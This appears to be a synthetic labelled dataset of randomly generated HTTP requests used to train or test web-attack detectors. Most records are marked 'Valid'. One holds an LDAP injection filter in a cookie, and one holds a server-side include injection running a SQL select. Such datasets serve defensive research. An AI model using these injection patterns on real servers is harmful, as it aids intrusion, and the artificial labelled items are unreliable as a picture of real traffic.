Expect: 100-continue
From: ollao@ehcaufe.uk
If-Modified-Since: Sun, 31 Jan 10 10:08:01 UTC
If-Unmodified-Since: Tue, 06 Sep 05 18:50:16 UTC
If-Match: *
If-None-Match: "g0qexZaHt0d-fGD"
If-Range: Wed, 01 Jul 09 01:40:32 CET
Max-Forwards: 3
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ef6srni"
Authorization: Basic cWR0ZnI6eXNhZGVrdA==
Range: -31378,040524-,4380-77
Referer: http://ctengs.com/kmmnl/rasMron/7IAH.js
TE: chunked;q=0.5,gzip
Trailer: From
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 1.7; at-av; rv:6.6.6) Gecko/56882252
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0894x8053
Via: 7.1 www.UiieU.jpeg, FTP/4.1 61.72.152.86, FTP/7.5 www.er0dw.css:09415
Transfer-Encoding: gzip
Upgrade: ialo/7.9, qe2/4.1, loAe/3.6
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 29825760
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

l6e0daw=69907&_@kZn7gZC=7031267976&h3=+ynewu6zlh&Ph6T=:24fc&adp=aj\input&lahlioe=geilzupdate&rmcmge9a2ioopn=o0rmtieps&htr3n=Mg@6&mcj8=Hd&owshutdownrhE1Pc6Z=seadneoinzqo8ez&brp9b=77198266&rjs=txeersl

End - Id: 34656
Start - Id: 15920
class: Valid
GET /tFItG7qlB-noZ_s/aeecyry/altjsapbearFw9ah/rinrkstbr/a4i/wFh.jpeg?rcttt=09&cuyaiEbe9gip=it&d0objectuBhnK=yixmlqypEce%3F2ieidt2b%24from&swdeeuoe3th9s9m=02499&284vn=r%26%3C7%2BxtautoexecatelnetagTm&EwtIrtn=2536189&nBRprocessing-instructionIvoOgroup by1Kk=72&Pc-1g90j9vincludeN=+ooccrd&sldweadifuiamLe=nNwK23c&87cd4no=iro&swQbgsoundFfdocumentxERiM=gUJg9i1nPSk HTTP/1.0
Host: 192.65.22.96:80
Connection: keep-alive
Accept: video/*;q=0.3, application/zip, text/html;q=0.5
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: tri-rsaNhs, teht-is;q=0.6, yheab-n;q=0.7, dln-ii, ullTe4-boeIkDm;q=0.3
Cache-Control: min-fresh=1355
Client-ip: 49.38.48.233
Cookie: eelcstn4bnsDTE=hptyergeaterhii;otjAefH3tfUre=zosu nD ae:ujfaxaa;ase=45790
Cookie2: $Version="8"
Date: Wed, 02 Dec 09 23:10:23 UTC
ETag: W/"s7DDYDkZ.STZGGfC"
Expect: 100-continue
From: rdeheo@87jlxnnr1b.com
If-Modified-Since: Wed, 20 Aug 08 15:33:22 CET
If-Unmodified-Since: Sat, 27 May 06 05:29:02 GMT
If-Match: *
If-None-Match: "avol@.Oi3eEMeyr"
If-Range: *
Max-Forwards: 31
MIME-Version: 2.7
Pragma: 0nve=selyaar
Proxy-Authorization: Digest username="tiuiqpiw"
Authorization: Digest realm
Range: -08,0744-,-43437
Referer: http://eaeysic.net/lCemr/aess.htm
TE: trailers,trailers,chunked
Trailer: Accept-Charset
User-Agent: aVxMO_ http://www.edzaiert.de
UA-CPU: 68000
UA-Disp: 1586,328,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 809x4500
Via: FTP/3.9 126.90.112.161, 3.1 www.ianeowc.jpeg, HTTP/3.2 52.69.185.118
Transfer-Encoding: compress
Upgrade: otrq/6.0, doyu/0.7, risbrn/5.4, noosNE/3.1, tej/4.1
Warning: 347 233.121.22.24 "inemni" 
X-Forwarded-For: 94.69.136.69
X-Serial-Number: 721965
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15920
Start - Id: 27961
class: Valid
GET /J@/s8dWeplbM_sfdgn/tdi0m/e_ME74ay785-NCerr/7famCynBjeee5eie/z1G5W/0l9p7/rDWpd.BBK/rlBwgetxY/i32window.openvbscriptIameta9@/orthi8T6/lJDB.bin?cGpi7N=ro65DaJasetri1&iaohm26rnerSe=vpoI0RJN.&rduaAeces=791703&anhtr=hnnodeesz%27e%7Ch+mrboot.ini&drioh3hdceaan7=dKLJES.BYC&zdi3btnertSffit=15110&iywt1tithser=servicesf%3Ap&vWgUwk=8&obtms0=2623276 HTTP/1.0
Host: www.sloiset35.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: etSro7-hYO, sreie-6;q=0.0, Ea-sA1e;q=0.2, cEl9-SrSsrik;q=0.8, mktauno-d
Cache-Control: only-if-cached
Client-ip: 37.171.143.216
Cookie: 7ah7r6tteLruln=1;ohenne=lq7;zAo0eldH7nct=1469081460;inicn= ;xPua-IM=69
Cookie2: $Version="939"
Date: Fri, 12 Oct 07 20:09:21 GMT
ETag: W/"jWRYbhByYe@mkrqJi7Ad"
Expect: amepA=rrroE
From: aclt@ntyaoohns.cz
If-Modified-Since: Sun, 13 Nov 05 04:01:01 CET
If-Unmodified-Since: Tue, 19 Apr 05 12:17:07 UTC
If-Match: "5utkp7@XkSg8e4tEwF"
If-None-Match: "AP_B3OANos.Ejdc"
If-Range: Sat, 06 Aug 05 01:57:35 GMT
Max-Forwards: 545
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic YmljbTprYzlpNGVi
Authorization: NTLM dDBvYWllZnROa2loZW90aElvcmRlaW9zN2hudHlncHNTcGxpZWhpbm5hcg==
Range: 561-
Referer: /terFa0em/eeoR/u5efta.doc
TE: chunked;q=0.6,chunked,chunked
Trailer: Accept-Encoding
User-Agent: evqwYf http://www.loehzt.be
UA-CPU: Sparc
UA-Disp: 485,488,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 223x2147
Via: 7.6 www.jahorf.jpg, FTP/8.1 148.167.76.191
Transfer-Encoding: compress
Upgrade: ln4enn/2.8, tnt/8.9
Warning: 080 www.hoprAi5e.jpg "twoeeNifnnI" "Wed, 10 Jun 09 03:58:11 GMT"
X-Forwarded-For: 80.235.203.15
X-Serial-Number: 74914
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27961
Start - Id: 26097
class: Valid
GET /AR6JrMttvgxeL3/Ch7/uxWB/tersfti9/AZL0FkJEJxF7opennph-A.jpg?eswilm=+wmpo&ectgeneSysqx=ko&ehodtdpamn=QmtaH8dftDSo&h6ttec=ls%3C&rehdgj=370188139&rsuYw=oltx4shsiuxtermi&zoa=lgO-ecIDxu&Teowehsroi9=jEI9h6FZ&0qtI@YNve=32263&tbtmw9g=%3B8wd&gbnan=%26fe&tle=isQm4odkun5bohzeO HTTP/1.0
Host: 174.242.188.243
Connection: close
Accept: image/*;q=0.8, application/*, application/*
Accept-Charset: x-mac-korean;q=0.3, windows-1255;q=0.6, iso-8859-15, iso-8859-3;q=0.4, euc-jp;q=0.8
Accept-Encoding: deflate, identity;q=0.8
Accept-Language: *;q=0.5
Cache-Control: tacihrOm='ulissnoe'
Client-ip: 104.91.44.192
Cookie: PN8dfLBt=wmtias iri
Cookie2: $Version="1"
Date: Mon, 24 Aug 09 06:52:39 GMT
ETag: "Ql9OThmryf.DkekWJs"
Expect: rbrac6=FnS6;tssyaNqE
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Sun, 18 Sep 05 17:06:51 CET
If-Unmodified-Since: Tue, 05 Jul 05 16:19:23 CET
If-Match: "LWxjqfSrilakD1UoU"
If-None-Match: "64VQhf2uae--9MvNPENC"
If-Range: Sun, 02 Oct 05 08:02:03 UTC
Max-Forwards: 3
MIME-Version: 4.2
Pragma: Uhbsc='ssohhs4n'
Proxy-Authorization: Digest uri=http://tehX8m.it/7nfoxbtj/obi9n.gif
Authorization: Basic YWNvb3I6b3dxbg==
Range: -41,2933-4708,1-5204
Referer: http://tutgs.it/pua6a/1gbn/Aevirc/8beOc.asmx
TE: trailers
Trailer: If-Range
User-Agent: ebeiaeniiy/8.3
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 096x0326
Via: 0.8 www.ayvteen.html
Transfer-Encoding: deflate
Upgrade: snTl/7.8, mlgvw4/0.1
Warning: 624 www.0t7ct.css "Ahem" 
X-Forwarded-For: 129.2.245.208
X-Serial-Number: 07602073887440146
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26097
Start - Id: 2485
class: Valid
GET /ufW/qUr3pWsccnP4XyUtPgy/dscript_Dupdate-RlZuMt5/TwLU9q4f8.css?aBleNs=28823624&qjeonlr=Enut3auti&teenyowvqnga0t=fgghfPZvUlM&zkEedtj=e+e%3Es7&Iis=082&oslta42ljnirOni=%25neIt%40nrF6+r&wfetik=eo7be5c&CaAb.TuGxf9_=oz%40d&sOeV=F0t&MAGaccess_log1ejQTF=4728&eoFase=homeoecopy+y&myQRp4YUMi=o7lhooinrg1 HTTP/1.0
Host: 193.204.186.35
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: tvyxhe-6, eamo8ala-6, i3mklol-aSsms;q=0.6
Cache-Control: only-if-cached
Client-ip: 100.174.188.163
Cookie: gzoyOi3xannS9=;ra3t;ichuy9o=5186;Awatlrc=66685
Cookie2: $Version="4"
Date: Tue, 01 Nov 05 06:45:03 GMT
ETag: W/"v7wXbGXa2_39d3H2aRx"
Expect: 100-continue
From: iUreeh@eetzlt4cr.gov
If-Modified-Since: Sun, 10 Sep 06 01:04:33 UTC
If-Unmodified-Since: Fri, 20 Feb 04 17:59:21 UTC
If-Match: "ZoFUYoq3xnKiwtb"
If-None-Match: "tkqkU-o7WS-WxHwZsTo8"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: aO8f iuk3ebu6=enntrr
Authorization: NTLM bW1wbGgwZ2s2b3lkc0FyaWZVYXJqaDhzZGpsZTFhZWhyd3VsaVo=
Range: 0555-2,778762-,232388-
Referer: /t1kt6ice.mpg
TE: chunked
Trailer: Date
User-Agent: 0d2oo5n
UA-CPU: x86
UA-Disp: 548,8459,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 392x1193
Via: 3.1 107.167.152.1
Transfer-Encoding: compress
Upgrade: tig/6.9, Enn6b4/1.7, cc51/4.1
Warning: 498 158.224.222.62 "n9caasp5evdsDan" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 347745233258688600
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2485
Start - Id: 17666
class: Valid
GET /@2ZKfRN/tsDiZb/tgeoxzla6fosvydorp8q/eldF/e1yy8a/exXv/g0toatwne5a3tmditn/rn/LT-wherew_/fljGSGgaaKCzoAa3iVo4.swf?r4t2o=ahrlIrreswioeui&reh=nfjRafhbtp&icrsdnq=5ifizolnaepioupe&efihq8R=h.e2y15&IgdivTPZyconnectLKi=mceltis0rBndlOsra&jt5h5=5%3Crc&AnmsgpLovne=%2F%3A+tv&mG1j=e&fWQt.samj=62&9TeolE2g4=ftque HTTP/1.1
Host: 235.247.92.183
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, compress;q=0.3, identity, identity, identity;q=0.2
Accept-Language: *;q=0.1
Cache-Control: zs=imetsys
Client-ip: 230.206.198.120
Cookie: 8toS3aEs5ecd=n%m etc%
Cookie2: $Version="003"
Date: Mon, 05 Mar 07 01:40:31 UTC
ETag: "w3D25KVVt4PU3k45y0kF"
Expect: 100-continue
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 18 Mar 08 04:28:52 GMT
If-Unmodified-Since: Sat, 27 Sep 08 06:02:35 GMT
If-Match: "j3lRtEQ3XV6r@ZLqAGu"
If-None-Match: *
If-Range: Sat, 30 Apr 05 05:09:57 CET
Max-Forwards: 8
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM c3RkdWdlYXJyeGhPbnRrbHlpZmllbWQ4Ym9HbnUwZWxlcm9pZWVvZVRy
Authorization: eihw 0erb=eebdTn
Range: 7-,-84952
Referer: http://www.iaoNt.biz/a9iynRSn/eCuo/2mrbIte/sfakr/nlfst.exe
TE: trailers
Trailer: If-Modified-Since
User-Agent: CnusenSuoelAe
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 813x197
Via: HTTP/6.0 www.eprreIcs.jpg
Transfer-Encoding: E8ese; smln5ei=z5R8lv
Upgrade: sroe/0.2, 5nn3e/7.9, hetla/5.6
Warning: 288 51.112.234.217 "feiedSegcNUchAneon2h" "Thu, 19 Feb 09 11:59:33 UTC"
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 6572400
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 17666
Start - Id: 11674
class: Valid
GET /vcaCwNein/dX/iEHexecno.swf?TservicesnvJ=ipep99h4ikreo&t5l=childt&wathmhurap=-te&aosm47ft6Nthom=d&WfQsJservices=%7Ed%3B+&Bkd=2&cVkc_-N3p=dwsnSe&9dypBt=tde-%27%3A%29+goeieopen&08noden6gngacceptr7b=be+nsIr&Minzin00xvbscriptN=45 HTTP/1.0
Host: www.tpyeh10h.com
Connection: keep-alive
Accept: audio/x-wav, image/png, video/mpeg
Accept-Charset: windows-1251, x-mac-cyrillic;q=0.3
Accept-Encoding: *
Accept-Language: sldci2-unruh;q=0.2
Cache-Control: Fsoannnk='uqcd'
Client-ip: 37.188.138.86
Cookie: edyRet=cta1ae3e4tleon
Cookie2: $Version="919"
Date: Thu, 22 Jul 04 13:41:43 GMT
ETag: W/"NeTWZ@uyDDwlmMX13_"
Expect: eihth
From: C0is7rzs@5il9oa.biz
If-Modified-Since: Wed, 27 Jan 10 09:39:02 UTC
If-Unmodified-Since: Fri, 23 Dec 05 08:15:16 CET
If-Match: "V8kBTJc@pv7t.1A0CYp"
If-None-Match: "Hyiko2PDtmRtFciat"
If-Range: "v.59m-aagye789YQXq-"
Max-Forwards: 3
MIME-Version: 2.8
Pragma: atIta=thsse8t
Proxy-Authorization: NTLM b250TmFkbjRhZ1RObmROYkd0bzRlbmxoNWk3eHJ0YnBhNXI2Zm4wZGRiZGw=
Authorization: hasn a4ec0=BC1tkar
Range: 93-2855,61-3
Referer: http://www.ootnOb6s.it/uSec/isoerr/tHeet5E2.pl
TE: trailers,gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 0.8; iy-ry; rv:9.7.1) Gecko/56270108
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9473x212
Via: 9.6 134.246.13.42, FTP/5.2 217.194.8.23, 8.9 203.13.47.2
Transfer-Encoding: identity
Upgrade: raif/5.6, ath/3.2, aqvie3/5.3
Warning: 697 www.ewwxae.shtml "tt6medno" "Sat, 07 Mar 09 21:52:47 CET"
X-Forwarded-For: 105.168.38.104
X-Serial-Number: 2344723441
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11674
Start - Id: 24637
class: Valid
GET /1H_i5Phomei/tCp/2EiLJOwYsUqp/exk9UX.-.VUrby-6q/e47OS4suUyu-8c/X@/afkzkH.xASYCkOZ7Q/nGi/bTLAEaZBEHxJA_Pfhyb3/QL/mRbNiLq.bin?hrjeme0=902483&cpd=t5%40&vxz=ii0CK8jGhK&4iht3=950&mrrnso=749875&c5jsognmh=oScjlytsNA5r&7hdivErpa=ranull&nulljJFz.ZTe=0330&Z.WbodyunDhlocation=+d8i%27&MRdbautoexecUHeF=onb%2Bn&mo7hnie=md1Cl%40s&yperl9Q@2zpXUG=60 HTTP/1.1
Host: www.ejoogdh.cz
Connection: keep-alive
Accept: video/*;q=0.0
Accept-Charset: x-mac-ce, x-mac-cyrillic;q=0.5, macintosh
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 78.42.192.138
Cookie: ttcrhri17eo9=Wtnw;thseudv=65357;dtef3fbywJaxnh=14431;rP.l4enGP=itaaca9burpWoqeUck;beeSrtrmbrg=yTla8Inlbauot
Cookie2: $Version="479"
Date: Wed, 26 Oct 05 21:21:56 CET
ETag: W/"R42UaEF-6rwLFouHVz"
Expect: 100-continue
From: fmet44t@idw1orkL6v.uk
If-Modified-Since: Fri, 30 Jun 06 05:24:35 CET
If-Unmodified-Since: Fri, 08 Dec 06 09:42:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 3.4
Pragma: oo=oclis6
Proxy-Authorization: NTLM aWhhdG5oR3dsaXRuMWE4dVR2enN4Qnc2Y25xaXJlYWNheGU=
Authorization: Eowi hhviTt=Syee0gy
Range: 631670-990,0718-
Referer: /0aaw.bin
TE: trailers
Trailer: If-Modified-Since
User-Agent: hWsUA-.qp http://www.weneSezy.com
UA-CPU: StrongARM
UA-Disp: 7015,359,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 803x2211
Via: 7.0 20.82.60.140:176
Transfer-Encoding: deflate
Upgrade: sa2tyk/6.0, ly6g/2.9, sriz/6.1, xel/4.8
Warning: 846 www.iihrevae.gif "eaehIhsswntnhuios8" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24637
Start - Id: 39125
class: LdapInjection
POST /r7rX/kesehdotp/1E1OhpksP/vgPM/Pir.bin? HTTP/1.0
Content-Length: 306
Content-Language: m,nmto
Content-Encoding: deflate
Content-Location: http://www.rcsHdag.fr/ru053w/1anst.swf
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Oct 06 10:54:54 GMT
Host: www.kQnsssi.gov
Connection: close
Accept: video/mpeg;q=0.9, audio/*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.1, compress, compress, deflate;q=0.1, deflate;q=0.0
Cache-Control: no-cache
Client-ip: 14.249.29.173
Cookie: iT3htfilo=ienTe)(&(objectClass =  d7eS*)
Date: Sun, 27 Jul 08 09:47:14 UTC
ETag: W/"J52YFSI1o.gQIj5TO"
If-Modified-Since: Sun, 18 May 08 16:27:01 CET
If-Unmodified-Since: Wed, 07 Dec 05 08:25:04 GMT
If-Match: *
If-None-Match: "uD2m427@hmI5dFDl0TD"
If-Range: *
Max-Forwards: 5
Proxy-Authorization: Basic cmNxZDpuVHJ1
Authorization: Digest response="cbE5eb3BD169E8dFF857E0B7bE428A95"
Referer: /yytbo6/Thtbitt.exe
TE: trailers,deflate,trailers
User-Agent: Mozilla/8.4 (compatible; MSIE 4.5; Solaris; weyr; dhftrtimc)
UA-CPU: StrongARM
Warning: 902 www.uilwPc.css:845 "oeiEs0u1" "Sat, 29 Nov 08 05:38:05 GMT"
X-Forwarded-For: 128.219.205.1

oetibnrhareog8=rfia&Winputgps=Hjroh&dLflaIf1=rQNnkZYseXRp&uoseeleee8Eetw=sSiLasgihnCafeeacs&inataxneeasn4m=8506846&Rf5neu0ogowt=ouLwr&vehssm=5or3rCl&eLG=i fxterm8&.rBa=41730774&tLwtLCmi4t_=etoPlFt0le&nFeswo=16598&8TMjczBDERm3=t$&services87R3jw=b2x&eVeO=tinsnph-e7Nnkiike8&QYXsqw-gB.= qtih ulm)eitefmdnv

End - Id: 39125
Start - Id: 40750
class: SSI
POST /ee4rl5n4Ohnpjt/ez_pnXqW/rFnlatufAeeeahhHf/eiaGaam51ieu.sh? HTTP/1.0
Content-Length: 256
Content-Language: fzoen
Content-Encoding: gzip
Content-Location: /10xie/Toonlnua.gif
Content-MD5: bWVWbm5uTG1hYW10Y2VqeA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Mar 06 13:25:17 UTC
Host: www.sterhimdm.de:14413
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Date: Fri, 09 Dec 05 05:20:36 GMT
Expect: 100-continue
If-Modified-Since: Sun, 04 Oct 09 04:14:03 GMT
If-Match: *
Max-Forwards: 8
Authorization: rtyva7 ptnns=ehdahdii
Range: 30-86033,50297-483952,510771-833674
Referer: /idXjo/salMwg/zndl7/ew6s/isntXtny.txt
TE: trailers,gzip,trailers
User-Agent: islkotbsmot6m8zii2m2
UA-Color: color16
Via: HTTP/3.2 www.htVamou0.shtml:21
Upgrade: etg/2.7
----: ----------------------------------------------

e8mtiswsgh=t3ihstdfdT6l&3zosePsnt=selectfis&&CdVprocessing-instructionVN6aBZiI=teeheorlmioslnva&ehk=<!--#odbc     statement    =  "select  Ii, iArr,     sc     from leerlohrr    order   by 6,    44,    5"  -->&s0osr=nebgsoundttbiyvo

End - Id: 40750
Start - Id: 28938
class: Valid
GET /nee/tnwpcgntaiTot99e/xCQ.QNw.jpg? HTTP/1.1
Host: 223.188.239.230
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sn-o9tyrtei, rest-9Ro, eg7-oetteend, sche-vitHtta
Cache-Control: no-transform
Client-ip: 177.45.35.215
Cookie: ieaaa=nu94uKhPUW;hgndn2=xArTd-y5bSw;7c9setdtt5dky=:tlsdimdaswoia;@9LEHn=06708;srr=duhttpsaiko
Cookie2: $Version="7"
Date: Tue, 26 Sep 06 18:29:40 GMT
ETag: W/"r_14kZZVNED_XR.CY"
Expect: r9naTT0=pihtop;7hcs
From: iItoh5s@s6adT2ahhc.cz
If-Modified-Since: Tue, 11 Oct 05 19:49:17 UTC
If-Unmodified-Since: Sun, 12 Jul 09 07:44:06 CET
If-Match: "@l4THu81ImO@p_s7BNq"
If-None-Match: "cr2@ZIgGa9z.7nagVk."
If-Range: Sat, 07 Apr 07 13:49:55 UTC
Max-Forwards: 704
MIME-Version: 9.9
Pragma: a379vS='ttcTs5'
Proxy-Authorization: Basic c2VUOG9oOTE6Ym5hZm5JMw==
Authorization: Digest username="shka"
Range: 7-,028-767,79-309
Referer: http://iDmet.ch/aQu0odia.sh
TE: chunked,deflate;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 8.6; ae-ls; rv:4.7.1) Gecko/89839359
UA-CPU: MIPS
UA-Disp: 3959,584,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 552x545
Via: FTP/6.2 14.189.162.2, 7.0 179.83.178.146:979, 5.5 www.thAiEr.jpeg
Transfer-Encoding: gzip
Upgrade: lBLSOi/2.1, hcmm/7.1, etca/6.2
Warning: 956 46.219.144.237 "etii1isemaettnnau" 
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7931332
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28938
Start - Id: 3582
class: Valid
GET /paa.cgi?mSQr6nep=zaIoTsia2o0n7riof&tn=caiPactallitaetir2&tSns3sfxW=nAnn&tnei2=009931&bnyessIx5OEc=ornc%3F%3Eejnott&8snlenogolt8i=scHtean&oT.Lbiasock_stream8d=rt6ho&uO=ot-ft&u0=5rhtpasse%24t+t&hh=e+ee+oE%40swcopye%3Bastyle+ HTTP/1.0
Host: www.uptbteed44.com
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-6
Accept-Encoding: deflate, compress;q=0.4, compress;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 148.242.32.96
Cookie: sgolc=5752;gusaetedaEphorx=2cetweaiax2c3leru
Cookie2: $Version="422"
Date: Tue, 17 Aug 04 05:54:12 GMT
ETag: W/"AKGnIz5yWE.QHcj4QR"
Expect: 100-continue
From: ic6er@ToeneiH.uk
If-Modified-Since: Wed, 28 May 08 15:17:42 CET
If-Unmodified-Since: Sun, 06 May 07 10:59:19 GMT
If-Match: *
If-None-Match: "JEeeLvXV@BK0gGb_S39P"
If-Range: Fri, 20 Jan 06 22:05:17 GMT
Max-Forwards: 646
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: NTLM YXVyaXB0eTVBc2lDcmhNZWFjU2hhcmU5dGh0aWlydGE=
Range: 285-321592,-0,1-98
Referer: /xvgemc/yswtuva0/gUee0ind/tnqeoEa.dll
TE: gzip;q=0.7,chunked;q=0.0
Trailer: Authorization
User-Agent: Mozilla/0.4 (compatible; Konqueror/9.8; Linux i586; duerIaay)
UA-CPU: MIPS
UA-Disp: 481,666,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 047x6463
Via: 8.5 www.ATisae3u.css, 3.2 www.aegdm.jpg
Transfer-Encoding: ealf
Upgrade: qmin7m/5.2, ymfn/6.7, oX9/9.1, 2ub/7.6
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3582
Start - Id: 5807
class: Valid
POST /Cbetween3E.G/lnmdLo/ax4aPizOnZWeN/stetdiginbs.cfm? HTTP/1.0
Content-Length: 104
Content-Language: ci,ssve,8iK7ao
Content-Encoding: gzip
Content-Location: http://uI009.it/ptntsa/eoeh/Maokfcd.asp
Content-MD5: bGVscnJybmxzV2FlaG9tdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Jan 08 07:42:40 UTC
Last-Modified: Thu, 29 Dec 05 20:09:58 GMT
Host: www.u5ayhs.net
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.6, iso-8859-9;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 42.172.144.34
Cookie: Ol=nbaypiihT;gmwsiArueie=6145390;FtsvfmetavEi=ecNeg;nprocessing-instructionz@z=d8Rd;nnmau=okthalolog|cd6)e=
Cookie2: $Version="558"
Date: Sat, 07 Jul 07 12:32:05 CET
ETag: W/"uwVaep9pp@bk-EHfUy__"
Expect: nel1=yoolom
From: s8eohuh@Trune.de
If-Modified-Since: Sun, 04 Jan 04 05:01:28 UTC
If-Unmodified-Since: Tue, 02 Dec 08 14:51:43 GMT
If-Match: "4YqicFqIkzTVFPjZHK"
If-None-Match: "X0skp2DqxUWIK8Mn"
If-Range: Wed, 11 Oct 06 24:53:37 GMT
Max-Forwards: 606
MIME-Version: 2.7
Pragma: timcpeex='dttheKt'
Proxy-Authorization: Basic dXBuY3VkOmhzMW9v
Authorization: NTLM ZXMwb2V0dG9mZHNlbG5uYXRnYWFhdXNlbWVhdW9sc2Vhbg==
Range: 741779-46
Referer: /tqt5/3eue.mpeg
TE: deflate;q=0.0,trailers
Trailer: Upgrade
User-Agent: Mozilla/6.0 (X11; U; Solaris 8.8; bn-a7; rv:0.7.3) Gecko/90407008
UA-CPU: MIPS
UA-Disp: 3134,886,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1021x7299
Via: 7.1 www.Aehao8t.htm
Transfer-Encoding: gzip
Upgrade: 1io/8.4, at7e/6.8
Warning: 057 www.Erpswu.tiff:80 "ws9y7tenxlrelypsyt" "Sun, 03 Sep 06 19:18:45 UTC"
X-Forwarded-For: 128.88.36.141
X-Serial-Number: 8692230651
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

opdyss=window.openeUv&ahpsj=n'&itgfHnheIdEu=a3sT7+deleteoegzEte&hmdflq=tls:&QH39NrU=14&dk3ooaqmn=n

End - Id: 5807
Start - Id: 19360
class: Valid
GET /raJvR2YklSW4y/tniq/u_-O7u6vQru72neLHQHb/iKv@1CcCS1Po7eAjd/hritaedhehnfeD/gsnbrtu/iIlSsHJrAJWRj.asp?DagI=2985931776&V.liVG=cu7n1mje HTTP/1.0
Host: 185.185.151.140
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, identity;q=0.1
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 60.233.136.142
Cookie: 8ziJeee2zcw=tzg5Uuou42sdeodDU4
Cookie2: $Version="883"
Date: Wed, 01 Feb 06 14:11:30 UTC
ETag: W/"8oxsEbtueYBtAIGzt"
Expect: 100-continue
From: qlsto@ebqi7.de
If-Modified-Since: Thu, 25 Nov 04 11:48:37 CET
If-Unmodified-Since: Mon, 06 Jul 09 08:06:28 UTC
If-Match: "iEBDk@yfqFIS7XG_"
If-None-Match: "eJuUhBBLcAi4p.Ul9B"
If-Range: *
Max-Forwards: 065
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM YWN3bWVtZWZ0MjVhYjFzY2VhdG5zc2VxZGFiZWVuQnRvY2lyZw==
Authorization: Basic bmNkdHJwOmV3cnRkM28=
Range: 9977-630140
Referer: http://www.gt8he.uk/tmtsl/itiLinmb/baesf/hoe7b/xlDHne1d.htm
TE: trailers
Trailer: If-Match
User-Agent: vOahalmi (h-g5uWCjuW)
UA-CPU: Sparc
UA-Disp: 674,7588,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 810x5301
Via: 8.2 www.ieg4ttea.png, 0.5 98.22.169.197, HTTP/0.0 1.232.134.168
Transfer-Encoding: compress
Upgrade: 0sO/7.7
Warning: 825 www.3Eothdos.gif:29220 "iow9t" 
X-Forwarded-For: 106.216.193.253
X-Serial-Number: 04731684394484360206
----: ----------
